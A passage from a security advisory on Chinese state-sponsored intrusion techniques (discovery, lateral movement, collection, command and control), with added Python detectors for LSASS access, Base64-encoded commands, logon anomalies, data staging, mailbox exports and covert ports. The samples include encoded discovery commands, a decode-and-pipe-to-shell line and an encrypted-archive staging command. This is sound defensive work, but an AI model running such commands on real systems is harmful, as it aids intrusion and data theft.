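        reasons = triage_process_access(event)
        if reasons:
            findings[event["SourceImage"]] = reasons
    return findings


LSASS = r"C:\Windows\system32\lsass.exe"
NTDLL_FRAME = "C:\\Windows\\SYSTEM32\\ntdll.dll+9d234"  # constructed frame text

# Constructed events.
SAMPLE_EVENTS = [
    # Allowlisted antivirus engine with full access: expected.
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF", "CallTrace": NTDLL_FRAME},
    # Task Manager listing processes: query rights only, no memory read.
    {"SourceImage": r"C:\Windows\system32\taskmgr.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1400", "CallTrace": NTDLL_FRAME},
    # rundll32 reading LSASS memory from an unbacked region: injected tooling.
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": NTDLL_FRAME + "|UNKNOWN(000001E3A4B20000)"},
    # Unknown binary in a temp folder with full access.
    {"SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\svc.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF", "CallTrace": NTDLL_FRAME},
]

if __name__ == "__main__":
    for source, reasons in review(SAMPLE_EVENTS).items():
        print(source, "->", "; ".join(reasons))
```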
### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]
_Table IX: Chinese state-sponsored cyber actors’ Discovery TTPs with detection and mitigation recommendations_
Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
File and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]
|
Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.
|
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.
|
Detect:
* User Behavior Analysis
* Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]
* Process Analysis
* Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
Permission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]
|
Chinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network.
|
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
|
Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
Process Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]
|
Chinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.
|
Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
|
Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
Network Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]
|
Chinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.
|
* Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation.
* Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`.
* Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.
|
Detect:
* Network Traffic Analysis
* Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
Remote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]
|
Chinese state-sponsored cyber actors have been observed using Base64-encoded commands, including `ping`, `net group`, and `net user`, to enumerate target network information.
|
Monitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.
|
Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* User Behavior Analysis
* Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]
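The Remote System Discovery row above and the Obfuscated Files or Information row in Table VII describe the same evasion: discovery commands hidden behind Base64 encoding, which a command-line monitor only sees once it decodes the payload. The following is an added example (not from the advisory) that decodes `-EncodedCommand` PowerShell payloads and `echo ... | base64 -d` shell pipelines, then searches both the visible and decoded text for the discovery commands the advisory lists; the sample command lines and hostnames are constructed and encoded at import time.

```python
"""Decode Base64-embedded commands in process command lines and look for
discovery activity inside them.

Added example, not from the advisory. Sample command lines are constructed
(encoded at import time so the Base64 is correct for the plaintext shown).
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings commonly seen. The payload is Base64 over the UTF-16LE script.
PS_ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Unix equivalent: a literal piped through base64 -d into a shell.
SH_ENCODED = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)", re.I)
# Commands the advisory lists for discovery (net group/user, ping, tasklist, ps, ...).
DISCOVERY = re.compile(
    r"\b(net\s+(?:group|user|localgroup)|ping|tasklist|taskmgr|ps|jobs|nbtscan|nmap)\b", re.I)


def decode_embedded(cmdline):
    """Return every payload that decodes cleanly; garbage blobs are skipped."""
    decoded = []
    for match in PS_ENCODED.finditer(cmdline):
        try:
            decoded.append(base64.b64decode(match.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    for match in SH_ENCODED.finditer(cmdline):
        try:
            decoded.append(base64.b64decode(match.group(1)).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def triage(cmdline):
    """Decode, then search the visible and decoded text for discovery commands."""
    decoded = decode_embedded(cmdline)
    hits = set()
    for text in [cmdline, *decoded]:
        for hit in DISCOVERY.findall(text):
            hits.add(re.sub(r"\s+", " ", hit.lower()))
    return {"decoded": decoded, "discovery": sorted(hits),
            # Encoding plus enumeration is the combination the advisory describes.
            "suspicious": bool(decoded) and bool(hits)}


def _ps_b64(script):
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _sh_b64(script):
    return base64.b64encode(script.encode("utf-8")).decode("ascii")


# Constructed samples: the scripts and the hostname dc01 are made up.
PS_PLAINTEXT = "net group /domain; net user /domain; ping -n 1 dc01"
SH_PLAINTEXT = "ps -ef; jobs"
SAMPLE_CMDLINES = {
    "ps_encoded": f"powershell.exe -NoP -W Hidden -enc {_ps_b64(PS_PLAINTEXT)}",
    "sh_encoded": f'bash -c "echo {_sh_b64(SH_PLAINTEXT)} | base64 -d | sh"',
    "benign": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
}

if __name__ == "__main__":
    for label, cmdline in SAMPLE_CMDLINES.items():
        print(label, triage(cmdline))
```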
### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]
_Table X: Chinese state-sponsored cyber actors’ Lateral Movement TTPs with detection and mitigation recommendations_
Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Exploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]
|
Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.
Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.
|
* Disable or remove unnecessary services.
* Minimize permissions and access for service accounts.
* Perform vulnerability scanning and update software regularly.
* Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.
|
Detect:
* Network Traffic Analysis
* Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
Isolate:
* Execution Isolation
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]
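The Modify Authentication Process row in Table V asks for exactly the account-behaviour checks that catch the valid-account remote logons described above: one account with sessions on several systems at once, and logons at odd hours. The following is an added example (not from the advisory) that runs those checks, plus a network-logon fan-out check, over constructed logon records shaped like parsed Windows 4624 events (LogonType 10 = RDP, 2 = console, 3 = network) and sshd accepted logins; the thresholds, business hours and records are assumptions.

```python
"""Find valid-account abuse patterns in logon records.

Added example, not from the advisory. Records are constructed in the shape a
SIEM gives Windows 4624 events and sshd "Accepted" lines after parsing.
"""
from collections import defaultdict
from datetime import datetime, timedelta

LOGON_TYPE_NAMES = {2: "console", 3: "network", 10: "rdp"}
REMOTE_SESSION_TYPES = {"rdp", "console", "ssh"}   # interactive sessions only
BUSINESS_HOURS = range(7, 20)                      # 07:00-19:59 local, weekdays (assumed)
CONCURRENCY_WINDOW = timedelta(minutes=30)
NETWORK_FANOUT_THRESHOLD = 5   # distinct hosts reached via type-3 logons in the window


def _kind(logon_type):
    """Map a 4624 LogonType number, or a service name such as 'ssh', to a label."""
    return logon_type if isinstance(logon_type, str) else LOGON_TYPE_NAMES.get(logon_type, "other")


def analyze(records):
    """Map user -> findings (concurrent sessions, odd hours, network fan-out)."""
    by_user = defaultdict(list)
    for r in records:
        by_user[r["user"]].append((datetime.fromisoformat(r["time"]), r["host"], _kind(r["logon_type"])))
    findings = defaultdict(list)
    for user, logons in by_user.items():
        logons.sort()
        for i, (t, host, kind) in enumerate(logons):
            if kind in REMOTE_SESSION_TYPES and (t.hour not in BUSINESS_HOURS or t.weekday() >= 5):
                findings[user].append(f"{kind} logon to {host} at {t:%a %H:%M} outside business hours")
            # Another interactive session on a different host inside the window.
            for t2, host2, kind2 in logons[i + 1:]:
                if t2 - t > CONCURRENCY_WINDOW:
                    break
                if kind in REMOTE_SESSION_TYPES and kind2 in REMOTE_SESSION_TYPES and host2 != host:
                    minutes = (t2 - t).seconds // 60
                    findings[user].append(f"{kind} session on {host} and {kind2} session on {host2} within {minutes} min")
        # Fan-out: one account reaching many hosts over the network in quick succession.
        network = [(t, h) for t, h, k in logons if k == "network"]
        for i, (t, h) in enumerate(network):
            hosts = {h2 for t2, h2 in network[i:] if t2 - t <= CONCURRENCY_WINDOW}
            if len(hosts) >= NETWORK_FANOUT_THRESHOLD:
                findings[user].append(f"network logons to {len(hosts)} hosts within {CONCURRENCY_WINDOW.seconds // 60} min")
                break
    return dict(findings)


# Constructed records; 2021-07-13 is a Tuesday, 2021-07-11 a Sunday.
SAMPLE_LOGONS = [
    {"time": "2021-07-13T09:05:00", "user": "alice", "host": "WS01", "logon_type": 10},
    {"time": "2021-07-13T09:12:00", "user": "alice", "host": "WS02", "logon_type": 10},
    {"time": "2021-07-13T10:00:00", "user": "bob", "host": "FS01", "logon_type": 3},
    {"time": "2021-07-13T11:00:00", "user": "carol", "host": "linux01", "logon_type": "ssh"},
    {"time": "2021-07-13T11:10:00", "user": "carol", "host": "WS03", "logon_type": 10},
    {"time": "2021-07-11T02:30:00", "user": "svc_backup", "host": "SRV01", "logon_type": 10},
] + [
    {"time": f"2021-07-13T13:0{i}:00", "user": "dave", "host": f"SRV{i:02d}", "logon_type": 3}
    for i in range(6)
]

if __name__ == "__main__":
    for user, items in analyze(SAMPLE_LOGONS).items():
        print(user, "->", "; ".join(items))
```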
### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]
_Table XI: Chinese state-sponsored cyber actors’ Collection TTPs with detection and mitigation recommendations_
Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Archive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]
|
Chinese state-sponsored cyber actors compressed and encrypted files for exfiltration into RAR archives and subsequently used cloud storage services to store them.
|
* Scan systems to identify unauthorized archival utilities or methods unusual for the environment.
* Monitor command-line arguments for known archival utilities that are not common in the organization's environment.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
Isolate:
* Execution Isolation
* Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)]
Clipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]
|
Chinese state-sponsored cyber actors used RDP and executed `rdpclip.exe` to exfiltrate information from the clipboard.
|
* Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g., excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through the command line).
* If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.
|
Detect:
* Network Traffic Analysis
* Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
Data Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]
|
Chinese state-sponsored cyber actors have been observed using the `mv` command to move files into a staging location, such as a compromised Microsoft Exchange or IIS server or an emplaced webshell, prior to compressing and exfiltrating the data from the target network.
|
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
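The following is an added example and not part of the advisory: a Python script that applies the Archive Collected Data, Clipboard Data and Data Staged recommendations above to process-creation events. The event field names (modelled on Sysmon Event ID 1 / Windows 4688 exports), the list of staging directories, the sample events and the baseline of (user, tool) pairs considered normal are all assumptions.

```python
"""Flag archive creation, staging and clipboard use in process-creation events.

Constructed example for this advisory (not the advisory's own code): the events
below stand in for Sysmon Event ID 1 / Windows 4688 records exported as dicts,
and the field names, staging directories and baseline are assumptions.
"""
import re

ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe", "7za.exe", "zip.exe", "tar.exe", "makecab.exe"}
# rar -hpPASS / rar -pPASS / 7z -pPASS create password-protected (encrypted) archives
ENCRYPT_FLAG = re.compile(r"(?:^|\s)-(?:hp|p)\S+", re.IGNORECASE)
CLIPBOARD_TOOLS = {"rdpclip.exe", "clip.exe", "pbcopy", "pbpaste"}
# Staging locations named in the advisory: temp folders, recycle bin, public and web-root dirs
STAGING_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\$recycle.bin\\",
                "\\users\\public\\", "\\inetpub\\wwwroot\\", "\\programdata\\", "\\tmp\\")
ARCHIVE_EXT = (".rar", ".7z", ".zip", ".cab", ".tar", ".gz")


def basename(image):
    """Lower-cased file name of an image path, Windows or POSIX separators."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def archive_targets(cmdline):
    """Archive paths named on the command line (quoted or bare tokens)."""
    tokens = [a or b for a, b in re.findall(r'"([^"]+)"|(\S+)', cmdline)]
    return [t for t in tokens if t.lower().endswith(ARCHIVE_EXT)]


def analyze(events, baseline=frozenset()):
    """Return findings for a list of process-creation events.

    baseline: {(user, image basename)} pairs that are normal in this environment,
    e.g. a build account that legitimately runs 7z.exe.
    """
    findings, suspicious, clipboard = [], set(), []

    def report(ev, rule, detail):
        findings.append({"host": ev["Host"], "user": ev["User"], "rule": rule, "detail": detail})
        suspicious.add((ev["Host"], ev["User"]))

    for ev in events:
        image, cmd = basename(ev["Image"]), ev["CommandLine"]
        if image in ARCHIVERS:
            if (ev["User"], image) not in baseline:
                report(ev, "uncommon_archiver", image)
            if ENCRYPT_FLAG.search(cmd):
                report(ev, "encrypted_archive", cmd)
            for path in archive_targets(cmd):
                if any(d in path.lower().replace("/", "\\") for d in STAGING_DIRS):
                    report(ev, "staged_archive", path)
        elif image in CLIPBOARD_TOOLS:
            clipboard.append(ev)

    # Clipboard tools are legitimate on their own: report them only when the same
    # host/user already shows other suspicious activity, as the advisory recommends.
    for ev in clipboard:
        if (ev["Host"], ev["User"]) in suspicious:
            findings.append({"host": ev["Host"], "user": ev["User"],
                             "rule": "clipboard_tool_correlated", "detail": basename(ev["Image"])})
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Host": "WS-0142", "User": r"CORP\jdoe", "Image": r"C:\Program Files\WinRAR\rar.exe",
     "CommandLine": r"rar.exe a -r -hpS3cr3t! C:\Windows\Temp\out.rar C:\Users\jdoe\Documents\Projects"},
    {"Host": "WS-0142", "User": r"CORP\jdoe", "Image": r"C:\Windows\System32\rdpclip.exe",
     "CommandLine": "rdpclip.exe"},
    {"Host": "BUILD-01", "User": r"CORP\svc_build", "Image": r"C:\Tools\7z.exe",
     "CommandLine": r"7z.exe a C:\Builds\release.zip C:\Builds\bin"},
    {"Host": "WS-0077", "User": r"CORP\asmith", "Image": r"C:\Windows\System32\clip.exe",
     "CommandLine": "clip.exe"},
]
BASELINE = frozenset({(r"CORP\svc_build", "7z.exe")})

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS, BASELINE):
        print(f"{f['host']:9} {f['user']:15} {f['rule']:26} {f['detail']}")
```

On the sample, the build account's 7-Zip run is silent because it is in the baseline, the password-protected RAR written to `C:\Windows\Temp` raises three findings, and `rdpclip.exe` is reported only because the same host and user already triggered them; `clip.exe` on the other workstation is not reported at all.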
Email Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]
|
Chinese state-sponsored cyber actors have been observed using the `New-MailboxExportRequest` PowerShell cmdlet to export target email boxes.
|
* Audit email auto-forwarding rules for suspicious or unrecognized rulesets.
* Encrypt email using public key cryptography, where feasible.
* Use MFA on public-facing mail servers.
|
Harden:
* Credential Hardening
* Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]
* Message Hardening
* Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]
Detect:
* Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]
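The following is an added example and not part of the advisory: a Python audit over Exchange admin-audit records that catches the `New-MailboxExportRequest` procedure above and the auto-forwarding rules the recommendations say to review. The record shape (a flattened `Search-AdminAuditLog` entry with `Caller`, `CmdletName`, `RunDate` and a `Parameters` name-to-value map), the internal domain list and the sample entries are assumptions.

```python
"""Audit Exchange admin-audit records for mailbox exports and external forwarding.

Constructed example for this advisory (not the advisory's own code). The records
stand in for Search-AdminAuditLog output flattened to dicts; that shape, the
internal domain list and the sample entries are assumptions.
"""
import re

INTERNAL_DOMAINS = {"corp.example"}          # assumed organisation mail domains
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo", "ForwardingSmtpAddress")
RULE_CMDLETS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox"}
WEB_ROOT_HINTS = ("inetpub", "wwwroot", "owa", "ecp")
EMAIL = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")


def external_addresses(value):
    """Addresses in a parameter value whose domain is not one of ours."""
    return [m.group(0) for m in EMAIL.finditer(value) if m.group(1).lower() not in INTERNAL_DOMAINS]


def audit(records):
    findings = []
    for r in records:
        cmd, params = r["CmdletName"], r["Parameters"]
        base = {"when": r["RunDate"], "caller": r["Caller"], "cmdlet": cmd}
        if cmd == "New-MailboxExportRequest":
            path = params.get("FilePath", "")
            findings.append({**base, "rule": "mailbox_export",
                             "detail": f'{params.get("Mailbox")} -> {path}',
                             # a PST dropped under a web root is reachable through a webshell or plain HTTP
                             "web_exposed": any(h in path.lower() for h in WEB_ROOT_HINTS)})
        elif cmd in RULE_CMDLETS:
            for p in FORWARD_PARAMS:
                ext = external_addresses(str(params.get(p, "")))
                if ext:
                    findings.append({**base, "rule": "external_forwarding",
                                     "detail": f"{p}={','.join(ext)}"})
            # Rules that delete what they forward hide the forwarding from the mailbox owner
            if str(params.get("DeleteMessage", "")).lower() == "true":
                findings.append({**base, "rule": "rule_deletes_mail", "detail": params.get("Name", "")})
    return findings


SAMPLE_RECORDS = [  # constructed
    {"RunDate": "2021-06-02T03:14:07Z", "Caller": "corp.example/Users/svc_backup",
     "CmdletName": "New-MailboxExportRequest",
     "Parameters": {"Mailbox": "cfo", "FilePath": r"\\EXCH01\c$\inetpub\wwwroot\aspnet_client\cfo.pst"}},
    {"RunDate": "2021-06-02T03:20:41Z", "Caller": "corp.example/Users/cfo",
     "CmdletName": "New-InboxRule",
     "Parameters": {"Name": "sync", "ForwardTo": "archive.cfo@mail-sync.example.net", "DeleteMessage": "True"}},
    {"RunDate": "2021-06-03T09:00:00Z", "Caller": "corp.example/Users/asmith",
     "CmdletName": "New-InboxRule",
     "Parameters": {"Name": "Team", "ForwardTo": "team-lead@corp.example"}},
    {"RunDate": "2021-06-03T10:00:00Z", "Caller": "corp.example/Users/it-admin",
     "CmdletName": "Set-Mailbox",
     "Parameters": {"Identity": "helpdesk", "ForwardingSmtpAddress": "smtp:helpdesk@corp.example"}},
]

if __name__ == "__main__":
    for f in audit(SAMPLE_RECORDS):
        print(f"{f['when']} {f['caller']:32} {f['rule']:20} {f['detail']}")
```

Internal-to-internal forwarding is deliberately not reported, which keeps the output short enough to review daily; the export to an IIS web root is the case the Data Staged row above describes.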
### Tactics: _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]
_Table XII: Chinese state-sponsored cyber actors’ Command and Control TTPs with detection and mitigation recommendations_
Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Application Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]
|
Chinese state-sponsored cyber actors have been observed:
* Using commercial cloud storage services for command and control.
* Using malware implants that use the Dropbox® API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive® API.
|
Use network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.
|
Detect:
* Network Traffic Analysis
* Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]
Isolate:
* Network Isolation
* DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
Ingress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]
|
Chinese state-sponsored cyber actors have been observed importing tools from GitHub or compromised domains into victim networks. In some instances, Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.
|
* Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior.
* Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.
* Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.
|
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
Non-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]
|
Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure.
|
* Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.
* Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.
* Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.
|
Detect:
* Network Traffic Analysis
* Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
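The following is an added example and not part of the advisory: a Python pass over connection records that implements the two checks recommended above, payload that does not match the port (here SSH on a port reserved for HTTPS) and egress that a segment's firewall policy should not allow. Each flow carries a `service` label produced by a sensor's protocol analyzers rather than by port number (Zeek's `conn.log` has such a column); the flows, expected-port map, address ranges and per-segment policy are assumptions.

```python
"""Find services on unexpected ports and egress that a segment's policy does not allow.

Constructed example for this advisory (not the advisory's own code). The flows,
port map, address ranges and per-segment egress policy are assumptions.
"""
import ipaddress

EXPECTED_PORTS = {"ssh": {22}, "http": {80, 8080}, "tls": {443, 8443}, "dns": {53}, "rdp": {3389}, "smb": {445}}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
# Outbound ports each segment may reach on the Internet (assumed policy):
# workstations browse and resolve names; the DMZ web tier initiates nothing.
EGRESS_POLICY = {
    ipaddress.ip_network("10.20.0.0/16"): {53, 80, 443},   # workstations
    ipaddress.ip_network("10.50.0.0/24"): set(),           # DMZ web servers
}


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def egress_allowed(src):
    """Allowed outbound ports for src's segment, or None when no policy covers it."""
    for net, ports in EGRESS_POLICY.items():
        if src in net:
            return ports
    return None


def inspect(flows):
    findings = []
    for f in flows:
        src, dst = ipaddress.ip_address(f["src"]), ipaddress.ip_address(f["dst"])
        port, svc = f["dport"], f.get("service")
        where = {"src": f["src"], "dst": f["dst"], "dport": port}
        # The payload says one thing and the port another, e.g. an SSH banner on tcp/8443.
        if svc in EXPECTED_PORTS and port not in EXPECTED_PORTS[svc]:
            findings.append({**where, "rule": "port_service_mismatch", "detail": f"{svc} seen on tcp/{port}"})
        # Outbound to the Internet on a port the segment's policy does not permit.
        allowed = egress_allowed(src)
        if not is_internal(dst) and allowed is not None and port not in allowed:
            findings.append({**where, "rule": "egress_policy_violation",
                             "detail": f"tcp/{port} not allowed from the segment of {src}"})
    return findings


SAMPLE_FLOWS = [  # constructed
    {"src": "10.20.4.17", "dst": "203.0.113.45", "dport": 8443, "service": "ssh"},  # SSH hidden on an HTTPS port, to a VPS
    {"src": "10.20.4.17", "dst": "198.51.100.7", "dport": 443, "service": "tls"},   # ordinary browsing
    {"src": "10.50.0.12", "dst": "203.0.113.45", "dport": 443, "service": "tls"},   # DMZ server calling out
    {"src": "10.20.4.33", "dst": "10.0.1.5", "dport": 22, "service": "ssh"},        # internal admin SSH
    {"src": "10.20.4.33", "dst": "203.0.113.9", "dport": 53, "service": "tls"},     # TLS on the DNS port
]

if __name__ == "__main__":
    for f in inspect(SAMPLE_FLOWS):
        print(f"{f['rule']:24} {f['src']} -> {f['dst']}:{f['dport']}  {f['detail']}")
```

The first sample flow trips both checks at once, which is the combination the procedure above describes: a covert SSH channel to a VPS on a port chosen to look like HTTPS.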
Protocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]
|
Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic within existing network activity.
|
* Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.
* Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.
* Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).
|
Detect:
* Network Traffic Analysis
* Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]
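The following is an added example and not part of the advisory: Python heuristics for the DNS-carried tunnelling that tools such as dns2tcp produce (long, high-entropy, rarely repeated query names under one domain, often with TXT queries) and for the lopsided upload flows the last recommendation above describes. The query and flow records are constructed, the registered-domain split is a deliberate simplification (last two labels, no public-suffix list), and the thresholds are assumptions to tune against a local baseline.

```python
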